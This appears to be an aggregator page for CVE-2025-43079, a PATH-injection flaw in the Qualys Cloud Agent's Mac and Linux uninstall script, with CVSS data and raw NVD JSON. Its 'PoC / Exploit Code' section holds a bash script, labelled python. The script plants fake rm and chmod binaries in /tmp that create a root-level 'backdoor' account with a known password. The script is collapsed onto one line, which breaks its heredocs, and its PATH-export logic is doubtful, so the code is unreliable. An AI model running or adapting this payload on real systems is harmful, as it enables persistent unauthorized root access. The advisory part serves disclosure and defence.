Security Vulnerability Report
中文
CVE-2025-43079 CVSS 6.3 MEDIUM

CVE-2025-43079

Published: 2025-11-10 18:16:06
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Qualys Cloud Agent included a bundled uninstall script (qagent_uninstall.sh), specific to Mac and Linux supported versions that invoked multiple system commands without using absolute paths and without sanitizing the $PATH environment. If the uninstall script is executed with elevated privileges (e.g., via sudo) in an environment where $PATH has been manipulated, an attacker with root/sudo privileges could cause malicious executables to be run in place of the intended system binaries. This behavior can be leveraged for local privilege escalation and arbitrary command execution under elevated privileges.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Qualys Cloud Agent (Mac版) 所有版本
Qualys Cloud Agent (Linux版) 所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/bin/bash # CVE-2025-43079 PoC - PATH Injection in Qualys Cloud Agent uninstall script # Attacker preparation (must have sudo access) # Create malicious executables to replace system commands cat > /tmp/rm << 'EOF' #!/bin/bash echo "Malicious rm executed! Creating backdoor..." # Add root user or execute other malicious commands useradd -ou 0 -g 0 backdoor 2>/dev/null || true echo "backdoor:password" | chpasswd 2>/dev/null || true exit 0 EOF cat > /tmp/chmod << 'EOF' #!/bin/bash echo "Malicious chmod executed!" # Could escalate privileges further exit 0 EOF # Make malicious executables executable chmod +x /tmp/rm /tmp/chmod # Set PATH to prioritize /tmp (attacker controlled directory) export PATH=/tmp:/usr/local/bin:/usr/bin:/bin # When admin runs: sudo ./qagent_uninstall.sh # The script will execute our malicious binaries instead of system ones echo "PoC ready. Wait for admin to run: sudo ./qagent_uninstall.sh"

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43079", "sourceIdentifier": "[email protected]", "published": "2025-11-10T18:16:06.420", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Qualys Cloud Agent included a bundled uninstall script (qagent_uninstall.sh), specific to Mac and Linux supported versions that invoked multiple system commands without using absolute paths and without sanitizing the $PATH environment. If the uninstall script is executed with elevated privileges (e.g., via sudo) in an environment where $PATH has been manipulated, an attacker with root/sudo privileges could cause malicious executables to be run in place of the intended system binaries. This behavior can be leveraged for local privilege escalation and arbitrary command execution under elevated privileges."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.3, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-426"}]}], "references": [{"url": "https://www.qualys.com/security-advisories/cve-2025-43079", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.